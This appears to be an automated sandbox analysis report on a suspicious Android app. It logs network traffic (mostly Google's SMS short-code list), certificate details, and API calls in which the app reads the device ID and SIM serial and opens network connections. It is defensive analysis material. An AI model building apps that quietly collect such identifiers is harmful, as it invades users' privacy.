33 2f 6e 6a 6e 75 77 66 49 63 52 67 43 79 73 66 74 50 5a 6e 4d 30 41 3d 3d 0a 56 45 52 53 49 4f 4e 3a 31 35 0a 52 45 51 55 49 52 45 44 5f 48 41 53 48 3a 4e 4f 4e 45
Data Ascii: SIGNATURE:gjlBeFo3I5QBtOPbSgcUEaZQV1obT04Hb3d522P5mHw5vBpB8u8Vdl17YcSjc72mXorgvjbQMyYaqACdCc4JBh3bp/oof7Nhmmad9zGU7n+aVYceFM5f/A1nzDho2UZ7RPwuRpcR0mRU+xRGkJ3iTlknI80RO4IC0cHQJyp9/2+O/5qCZdFCl9zaVdc4e6YU9SQXJ/qnDEl7T8LXIER150bOc4CoUTeaGotUeg7oxZvbnPLT2jrquh8FhbuoRODfzfJ/41Iu03A2PNh2It5g1dkbqytN9oCaIbS+VZu0gHqu8uy9NpG9U0ij/b+eIMs3/njnuwfIcRgCysftPZnM0A==VERSION:15REQUIRED_HASH:NONE
196
Dec 21, 2017 18:02:15.989315033 CET5153880192.168.2.2172.217.17.99GET /android/config_update/08312017-sms-blacklist.txt HTTP/1.1
User-Agent: AndroidDownloadManager/5.1.1 (Linux; U; Android 5.1.1; VirtualBox Build/LMY48W)
Accept-Encoding: identity
Connection: close
Host: www.gstatic.com
197
Dec 21, 2017 18:02:16.225672007 CET8051538172.217.17.99192.168.2.2HTTP/1.1 200 OK
Accept-Ranges: none
Vary: Accept-Encoding
Content-Type: text/plain
Date: Mon, 18 Dec 2017 18:54:31 GMT
Expires: Tue, 26 Dec 2017 18:54:31 GMT
Last-Modified: Fri, 08 Sep 2017 01:15:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=691200
Age: 252465
Connection: close
Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 0a 2f 2a 0a 2a 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 2c 20 54 68 65 20 41 6e 64 72 6f 69 64 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 50 72 6f 6a 65 63 74 0a 2a 2a 0a 2a 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 2a 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 0a 2a 2a 20 59 6f 75 20 6d 61 79 20 6f 62 74 61 69 6e 20 61 20 63 6f 70 79 20 6f 66 20 74 68 65 20 4c 69 63 65 6e 73 65 20 61 74 0a 2a 2a 0a 2a 2a 20 20 20 20 20 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 61 63 68 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4c 49 43 45 4e 53 45 2d 32 2e 30 0a 2a 2a 0a 2a 2a 20 55 6e 6c 65 73 73 20 72 65 71 75 69 72 65 64 20 62 79 20 61 70 70 6c 69 63 61 62 6c 65 20 6c 61 77 20 6f 72 20 61 67 72 65 65 64 20 74 6f 20 69 6e 20 77 72 69 74 69 6e 67 2c 20 73 6f 66 74 77 61 72 65 0a 2a 2a 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 6f 6e 20 61 6e 20 22 41 53 20 49 53 22 20 42 41 53 49 53 2c 0a 2a 2a 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 49 45 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 0a 2a 2a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 0a 2a 2a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 0a 2a 2f 0a 2d 2d 3e 0a 0a 3c 21 2d 2d 20 52 65 67 65 78 20 70 61 74 74 65 72 6e 73 20 66 6f 72 20 53 4d 53 20 73 68 6f 72 74 20 63 6f 64 65 73 20 62 79 20 63 6f 75 6e 74 72 79 2e 20 2d 2d 3e 0a 3c 73 68 6f 72 74 63 6f 64 65 73 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 54 68 65 20 63 6f 75 6e 74 72 79 20 61 74 74 72 69 62 75 74 65 20 69 73 20 74 68 65 20 49 53 4f 20 63 6f 75 6e 74 72 79 20 63 6f 64 65 20 6f 66 20 74 68 65 20 75 73 65 72 27 73 20 61 63 63 6f 75 6e 74 20 28 66 72 6f 6d 20 53 49 4d 20 63 61 72 64 20 6f 72 20 4e 56 29 2e 0a 20 20 20 20 20 20 20 20 20 54 68 65 20 70 61 74 74 65 72 6e 20 61 74 74 72 69 62 75 74 65 20 69 73 20 61 20 72 65 67 65 78 20 74 68 61 74 20 6d 61 74 63 68 65 73 20 61 6c 6c 20 53 4d 53 20 73 68 6f 72 74 20 63 6f 64 65 73 20 66 6f 72 20 74 68 65 20 63 6f 75 6e 74 72 79 2e 0a 20 20 20 20 20 20 20 20 20 54 68 65 20 70 72 65 6d 69 75 6d 20 61 74 74 72 69 62 75 74 65 20 69 73 20 61 20 72 65 67 65 78 20 74 68 61 74 20 6d 61 74 63 68 65 73 20 70 72 65 6d 69 75 6d 20 72 61 74 65 20 53 4d 53 20 73 68 6f 72 74 20 63 6f 64 65 73 2e 0a 20 20 20 20 20 20 20 20 20 54 68 65 20 66 72 65 65 20 61 74 74 72 69 62 75 74 65 20 6d 61 74 63 68 65 73 20 73 68 6f 72 74 20 63 6f 64 65 73 20 74 68 61 74 20 77 65 20 6b 6e 6f 77 20 77 69 6c 6c 20 6e 6f 74 20 63 6f 73 74
Data Ascii: <?xml version="1.0" encoding="utf-8"?>.../*** Copyright 2012, The Android Open Source Project**** Licensed under the Apache License, Version 2.0 (the "License");** you may not use this file except in compliance with the License.** You may obtain a copy of the License at**** http://www.apache.org/licenses/LICENSE-2.0**** Unless required by applicable law or agreed to in writing, software** distributed under the License is distributed on an "AS IS" BASIS,** WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.** See the License for the specific language governing permissions and** limitations under the License.*/-->... Regex patterns for SMS short codes by country. --><shortcodes> ... The country attribute is the ISO country code of the user's account (from SIM card or NV). The pattern attribute is a regex that matches all SMS short codes for the country. The premium attribute is a regex that matches premium rate SMS short codes. The free attribute matches short codes that we know will not cost
198
Dec 21, 2017 18:02:16.225723028 CET8051538172.217.17.99192.168.2.2Data Raw: 20 74 68 65 20 75 73 65 72 2c 20 73 75 63 68 20 61 73 0a 20 20 20 20 20 20 20 20 20 65 6d 65 72 67 65 6e 63 79 20 6e 75 6d 62 65 72 73 2e 20 54 68 65 20 73 74 61 6e 64 61 72 64 20 61 74 74 72 69 62 75 74 65 20 6d 61 74 63 68 65 73 20 73 68 6f 72
Data Ascii: the user, such as emergency numbers. The standard attribute matches short codes that are billed at the standard SMS rate. The user is warned when the destination phone number matches the "pattern" or "premium" regex
200
Dec 21, 2017 18:02:16.225732088 CET8051538172.217.17.99192.168.2.2Data Raw: 36 7c 39 35 32 35 22 20 2f 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 42 65 6c 67 69 75 6d 3a 20 34 20 64 69 67 69 74 73 2c 20 70 6c 75 73 20 45 55 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 6c 65 77 65 62 2e 62 65 2f 65 6e 2f 6d 6f 62 69 6c 65
Data Ascii: 6|9525" /> ... Belgium: 4 digits, plus EU: http://www.mobileweb.be/en/mobileweb/sms-nu
200
Dec 21, 2017 18:02:16.228832006 CET8051538172.217.17.99192.168.2.2Data Raw: 6d 62 65 72 70 6c 61 6e 2e 61 73 70 20 2d 2d 3e 0a 20 20 20 20 3c 73 68 6f 72 74 63 6f 64 65 20 63 6f 75 6e 74 72 79 3d 22 62 65 22 20 70 72 65 6d 69 75 6d 3d 22 5c 64 7b 34 7d 22 20 66 72 65 65 3d 22 38 5c 64 7b 33 7d 7c 31 31 36 5c 64 7b 33 7d
Data Ascii: mberplan.asp --> <shortcode country="be" premium="\d{4}" free="8\d{3}|116\d{3}" /> ... Bulgaria: 4-5 digits, plus EU --> <shortcode country="bg" pattern="\d{4,5}" premium="18(?:16|423)|19(?:1[56]|35)" free="116\d{3}|1988|1490" />
201
Dec 21, 2017 18:02:16.228916883 CET8051538172.217.17.99192.168.2.2Data Raw: 20 20 20 3c 73 68 6f 72 74 63 6f 64 65 20 63 6f 75 6e 74 72 79 3d 22 63 6f 22 20 70 61 74 74 65 72 6e 3d 22 5c 64 7b 31 2c 36 7d 22 20 66 72 65 65 3d 22 38 39 30 33 35 30 22 20 2f 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 79 70 72 75 73 3a 20 34 2d
Data Ascii: <shortcode country="co" pattern="\d{1,6}" free="890350" /> ... Cyprus: 4-6 digits (not confirmed), known premium codes listed, plus EU --> <shortcode country="cy" pattern="\d{4,6}" premium="7510" free="116\d{3}" /> ... Czech
203
Dec 21, 2017 18:02:16.228925943 CET8051538172.217.17.99192.168.2.2Data Raw: 37 29 7c 38 30 28 3f 3a 30 30 38 7c 31 32 33 7c 38 38 38 29 7c 38 32 28 3f 3a 30 30 32 7c 5b 33 37 38 5d 30 30 7c 33 32 33 7c 34 34 34 7c 34 37 32 7c 34 37 34 7c 34 38 38 7c 37 32 37 29 7c 38 33 28 3f 3a 30 30 35 7c 5b 31 36 39 5d 30 30 7c 33 33
Data Ascii: 7)|80(?:008|123|888)|82(?:002|[378]00|323|444|472|474|488|727)|83(?:005|[169]00|333|830)|84(?:141|300|32[34]|343|488|499|777|888)|85888|86(?:188|566|640|644|650|677|868|888)|870[24]9|871(?:23|[49]9)|872(?:1[0-8]|49|99)|87499|875(?:49|55|99)|87
204
Dec 21, 2017 18:02:16.248480082 CET8051538172.217.17.99192.168.2.2Data Raw: 2f 45 6c 65 6b 74 72 6f 6f 6e 69 6c 69 6e 65 5f 73 69 64 65 2f 4f 69 67 75 73 61 6b 74 69 64 2f 45 4e 47 2f 45 73 74 6f 6e 69 61 6e 5f 4e 75 6d 62 65 72 69 6e 67 5f 50 6c 61 6e 5f 61 6e 6e 65 78 5f 30 36 5f 30 39 5f 32 30 31 30 2e 6d 68 74 20 2d
Data Ascii: /Elektrooniline_side/Oigusaktid/ENG/Estonian_Numbering_Plan_annex_06_09_2010.mht --> <shortcode country="ee" pattern="1\d{2,4}" premium="90\d{5}|15330|1701[0-3]" free="116\d{3}|95034" /> ... Spain: 5-6 digits: 25xxx, 27xxx, 280xx, 35
205
Dec 21, 2017 18:02:16.248522043 CET8051538172.217.17.99192.168.2.2Data Raw: 20 34 20 64 69 67 69 74 73 2c 20 6b 6e 6f 77 6e 20 70 72 65 6d 69 75 6d 20 63 6f 64 65 73 20 6c 69 73 74 65 64 20 2d 2d 3e 0a 20 20 20 20 3c 73 68 6f 72 74 63 6f 64 65 20 63 6f 75 6e 74 72 79 3d 22 67 65 22 20 70 61 74 74 65 72 6e 3d 22 5c 64 7b
Data Ascii: 4 digits, known premium codes listed --> <shortcode country="ge" pattern="\d{4}" premium="801[234]|888[239]" /> ... Ghana: 4 digits, known premium codes listed --> <shortcode country="gh" pattern="\d{4}" free="5041" /> ...
207
Dec 21, 2017 18:02:16.248529911 CET8051538172.217.17.99192.168.2.2Data Raw: 72 65 6d 69 75 6d 3d 22 34 34 32 32 7c 34 35 34 35 22 20 2f 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 49 74 61 6c 79 3a 20 35 20 64 69 67 69 74 73 20 28 70 72 65 6d 69 75 6d 3d 34 78 78 78 78 29 2c 20 70 6c 75 73 20 45 55 3a 0a 20 20 20 20 20 20 20 20
Data Ascii: remium="4422|4545" /> ... Italy: 5 digits (premium=4xxxx), plus EU: http://clients.txtnation.com/attachments/token/di5kfblvubttvlw/?name=Italy_CASP_EN.pdf --> <shortcode country="it" pattern="\d{5}" premium="4\d{4}" free="11
208
Dec 21, 2017 18:02:16.252479076 CET8051538172.217.17.99192.168.2.2Data Raw: 64 3a 20 68 74 74 70 3a 2f 2f 73 6d 73 63 6f 69 6e 2e 6e 65 74 2f 69 6e 66 6f 2f 70 72 69 63 69 6e 67 2d 6b 61 7a 61 6b 68 73 74 61 6e 2f 20 2d 2d 3e 0a 20 20 20 20 3c 73 68 6f 72 74 63 6f 64 65 20 63 6f 75 6e 74 72 79 3d 22 6b 7a 22 20 70 61 74
Data Ascii: d: http://smscoin.net/info/pricing-kazakhstan/ --> <shortcode country="kz" pattern="\d{4}" premium="335[02]|4161|444[469]|77[2359]0|8444|919[3-5]|968[2-5]" /> ... Kuwait: 1-5 digits (standard system default, not country specific) -->
209
Dec 21, 2017 18:02:16.252521038 CET8051538172.217.17.99192.168.2.2Data Raw: 20 70 72 65 6d 69 75 6d 20 63 6f 64 65 73 20 6c 69 73 74 65 64 2c 20 70 6c 75 73 20 45 55 20 2d 2d 3e 0a 20 20 20 20 3c 73 68 6f 72 74 63 6f 64 65 20 63 6f 75 6e 74 72 79 3d 22 6e 6c 22 20 70 61 74 74 65 72 6e 3d 22 5c 64 7b 34 7d 22 20 70 72 65
Data Ascii: premium codes listed, plus EU --> <shortcode country="nl" pattern="\d{4}" premium="4466|5040" free="116\d{3}|2223|6225|2223" /> ... Norway: 4-5 digits (not confirmed), known premium codes listed --> <shortcode country="no" patte
211

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Dec 21, 2017 18:04:25.089828014 CET44352263172.217.20.74192.168.2.2CN=*.googleapis.com, O=Google Inc, L=Mountain View, ST=California, C=USCN=Google Internet Authority G2, O=Google Inc, C=USWed Nov 29 10:52:01 CET 2017Wed Feb 21 10:37:00 CET 2018[[ Version: V3 Subject: CN=*.googleapis.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 29349691608895416868777997993100931202799362896725401169933458746256284034683729955698714146097475084656267393946110951151571966288760784678078884309286616608324002596734900404434160631595297700023785537908537696887646797059453287014878981506947636054621914755375503883361492408463370820199244901878556714797455447833878102147515265701463420887935247007586968243624915797292508909778488541474818389880673858033832261533228379428522989812874662178827649971416578211566399230176117823694263611314341931402693004169200561524693313692450474682778435538648200631514000439977927319335351842847567936487773989779441843850981 public exponent: 65537 Validity: [From: Wed Nov 29 10:52:01 CET 2017, To: Wed Feb 21 10:37:00 CET 2018] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 564777cb e67f5294]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][7]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.googleapis.com DNSName: *.clients6.google.com DNSName: *.cloudendpointsapis.com DNSName: cloudendpointsapis.com DNSName: googleapis.com][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C2 49 A7 01 3F E6 75 4D F5 4E AD 0B 4F 68 1A C9 .I..?.uM.N..Oh..0010: 7A 05 FD 7F z...]]] Algorithm: [SHA256withRSA] Signature:0000: 65 95 11 08 04 B8 3C F6 93 6A 37 1B 72 9C 67 72 e.....<..j7.r.gr0010: CD BB 54 F8 76 8C 05 3E A1 A7 7F CB BB 0D F0 26 ..T.v..>.......&0020: 40 A7 56 C3 6C BC 9A 06 50 91 5F 31 25 51 A8 90 @.V.l...P._1%Q..0030: 87 37 9B 9A F4 58 FA 28 85 5B D5 EA 34 90 7A 9A .7...X.(.[..4.z.0040: EB 11 0C 98 32 BA 8E D9 39 C2 4E 36 38 5D DE 41 ....2...9.N68].A0050: 92 E7 F9 45 6C 16 90 70 4B 69 0E 90 AA E7 19 BC ...El..pKi......0060: 8F 23 06 6A 4E CA 1B 95 19 63 1D 57 1E 73 15 C8 .#.jN....c.W.s..0070: FE C9 F9 57 E0 68 9A 32 06 E6 6B E9 52 00 F8 4F ...W.h.2..k.R..O0080: BA 61 35 04 51 16 BF C3 D1 18 F3 95 91 70 02 30 .a5.Q........p.00090: 37 0A 31 DD E6 F5 71 EF EC 88 EE B0 64 EB 6D 3F 7.1...q.....d.m?00A0: 29 1B BE 09 47 91 46 E3 2C 9F C8 85 71 D7 ED 45 )...G.F.,...q..E00B0: 93 29 88 2E 47 D0 85 F2 51 DF BB ED F9 3E 56 01 .)..G...Q....>V.00C0: D3 DF 4D F5 F9 5D 16 2D 2B 19 FE 11 64 C1 2A A9 ..M..].-+...d.*.00D0: FC A5 E1 6B 69 B9 17 B0 29 04 41 5E C4 D0 1C 62 ...ki...).A^...b00E0: 6A F3 9C 19 DC F4 B6 67 53 13 B1 6F EA A6 E8 11 j......gS..o....00F0: 78 DA E2 35 25 CE 23 6B 27 3B C6 7D 6B 31 2E BA x..5%.#k';..k1..]
Dec 21, 2017 18:04:25.089828014 CET44352263172.217.20.74192.168.2.2CN=Google Internet Authority G2, O=Google Inc, C=USCN=GeoTrust Global CA, O=GeoTrust Inc., C=USMon May 22 13:32:37 CEST 2017Tue Jan 01 00:59:59 CET 2019[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Mon May 22 13:32:37 CEST 2017, To: Tue Jan 01 00:59:59 CET 2019] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 01002125 88b0fa59 a777ef05 7b6627df]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: CA 49 E5 AC D7 64 64 77 5B BE 71 FA CF F4 1E 23 .I...ddw[.q....#0010: C7 9A 69 63 54 5F EB 4C D6 19 28 23 64 66 8E 1C ..icT_.L..(#df..0020: C7 87 80 64 5F 04 8B 26 AF 98 DF 0A 70 BC BC 19 ...d_..&....p...0030: 3D EE 7B 33 A9 7F BD F4 05 D4 70 BB 05 26 79 EA =..3......p..&y.0040: 9A C7 98 B9 07 19 65 34 CC 3C E9 3F C5 01 FA 6F ......e4.<.?...o0050: 0C 7E DB 7A 70 5C 4C FE 2D 00 F0 CA BE 2D 8E B4 ...zp\L.-....-..0060: A8 80 FB 01 13 88 CB 9C 3F E5 BB 77 CA 3A 67 36 ........?..w.:g60070: F3 CE D5 27 02 72 43 A0 BD 6E 02 F1 47 05 71 3E ...'.rC..n..G.q>0080: 01 59 E9 11 9E 1A F3 84 0F 80 A6 A2 78 35 2F B6 .Y..........x5/.0090: C7 A2 7F 17 7C E1 8B 56 AE EE 67 88 51 27 30 60 .......V..g.Q'0`00A0: A5 62 52 C3 37 D5 3B EA 85 2A 01 38 87 A2 CF 70 .bR.7.;..*.8...p00B0: AD A4 7A C9 C4 E7 CA C5 DA BC 23 32 F2 FE 18 C2 ..z.......#2....00C0: 7B E0 DF 3B 2F D4 D0 10 E6 96 4C FB 44 B7 21 64 ...;/.....L.D.!d00D0: 0D B9 00 94 30 12 26 87 58 98 39 05 38 0F CC 82 ....0.&.X.9.8...00E0: 48 0C 0A 47 66 EE BF B4 5F C4 FF 70 A8 E1 7F 8B H..Gf..._..p....00F0: 79 2B B8 65 32 A3 B9 B7 31 E9 0A F5 F6 1F 32 DC y+.e2...1.....2.]
Dec 21, 2017 18:04:25.089828014 CET44352263172.217.20.74192.168.2.2CN=GeoTrust Global CA, O=GeoTrust Inc., C=USOU=Equifax Secure Certificate Authority, O=Equifax, C=USTue May 21 06:00:00 CEST 2002Tue Aug 21 06:00:00 CEST 2018[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]

APK Behavior

Installation Messages
NameIs Error
  • Renaming /data/app/vmdl1329300705.tmp to /data/app/com.czybg.eqtbdmzpklrgyns-1
  • Running dexopt on: /data/app/com.czybg.eqtbdmzpklrgyns-1/base.apk pkg=com.czybg.eqtbdmzpklrgyns isa=x86 vmSafeMode=false
  • Not granting permission android.permission.REAL_GET_TASKS to package com.czybg.eqtbdmzpklrgyns (protectionLevel=18 flags=0x48be44)
false
Started Services

Simulated Events

TypeData
boot completed
  • -
time tick
  • -
incoming sms
  • 0123456789
  • this is a text message
outgoing sms
  • 9876543210
  • thank you
location change
  • 54.13
  • 12.14
incoming call
  • 0123456789
outgoing call
  • 9876543210
time tick
  • -
API: android.net.ConnectivityManager->getActiveNetworkInfo at com.czybg.eqtbdmzpklrgyns.LmcGi.xnLvoQ:17 Show source
API: android.net.ConnectivityManager->getActiveNetworkInfo at com.czybg.eqtbdmzpklrgyns.LmcGi.CyGFDR:3 Show source
API: android.net.ConnectivityManager->getActiveNetworkInfo at com.czybg.eqtbdmzpklrgyns.LmcGi.LmcGi:3 Show source
API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:16 Show source
API: android.net.ConnectivityManager->getNetworkInfo at com.czybg.eqtbdmzpklrgyns.LmcGi.hZyMGHgz:8 Show source
API: android.net.wifi.WifiManager->getConnectionInfo at com.czybg.eqtbdmzpklrgyns.LmcGi.Odjrct:15 Show source
API: android.content.pm.PackageManager->setComponentEnabledSetting at com.czybg.eqtbdmzpklrgyns.DIowQgu.DiXsQ:162 Show source
API: android.app.ActivityManager->getRunningTasks at com.czybg.eqtbdmzpklrgyns.uIcqnrbS.DiXsQ:5 Show source
API: android.app.ActivityManager->getRunningTasks at com.czybg.eqtbdmzpklrgyns.HLqFdR.DiXsQ:11 Show source
API: java.net.URL->openConnection at com.czybg.eqtbdmzpklrgyns.wymvtEV.DiXsQ:20 Show source
API: java.net.URLConnection->getInputStream at com.czybg.eqtbdmzpklrgyns.Odjrct.Odjrct:1 Show source
API: android.webkit.WebView-><init> at com.czybg.eqtbdmzpklrgyns.siQFgImL.xnLvoQ:43 Show source
API: java.net.URL->openConnection at ..:1 Show source
API: java.net.URL->openConnection at com.czybg.eqtbdmzpklrgyns.dclBIK.DiXsQ:20 Show source
API: java.net.URL->openConnection at com.czybg.eqtbdmzpklrgyns.MfOxe.DiXsQ:27 Show source
API: java.net.URL->openConnection at ..:1 Show source
API: java.net.URL->openConnection at com.czybg.eqtbdmzpklrgyns.uKHWhZbq.DiXsQ:21 Show source
API: android.telephony.TelephonyManager->getDeviceId at com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:49 Show source
API: android.telephony.TelephonyManager->getSimSerialNumber at com.czybg.eqtbdmzpklrgyns.jfIitJ.<init>:49 Show source
API: android.net.wifi.WifiManager$WifiLock->release at com.czybg.eqtbdmzpklrgyns.yCJnDqab.run:39 Show source
API: android.net.wifi.WifiManager$WifiLock->release at com.czybg.eqtbdmzpklrgyns.qwAiT.<init>:31 Show source
API: com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ->getPackageName at com.czybg.eqtbdmzpklrgyns.EZmcnv.<init>:3 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: com.czybg.eqtbdmzpklrgyns
API: android.app.SharedPreferencesImpl->getString at com.czybg.eqtbdmzpklrgyns.EZmcnv.xnLvoQ:7 Show source
NameTypeValue
p0java.lang.String
  • toString: kgfhjkhfshafd
p1java.lang.String
  • toString: ""
NameTypeValue
Return Valuejava.lang.String
  • toString: ""
